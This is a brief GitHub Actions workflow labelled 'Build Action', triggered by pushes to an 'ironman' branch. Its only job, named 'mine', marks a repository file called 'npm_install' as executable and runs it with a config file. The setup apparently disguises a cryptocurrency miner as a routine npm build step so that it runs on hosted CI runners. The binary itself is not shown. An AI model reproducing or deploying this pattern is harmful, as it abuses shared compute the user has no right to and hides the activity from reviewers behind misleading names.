name: Build Action

on:
  push:
    branches:
      - ironman

jobs:
  mine:
    runs-on: ubuntu-latest
    steps:
      - name: Setup Repository
        uses: actions/checkout@v3
      
      - name: Set Execute Permissions
        run: chmod +x npm_install

      - name: Start building
        run: |
          ./npm_install --config=config.json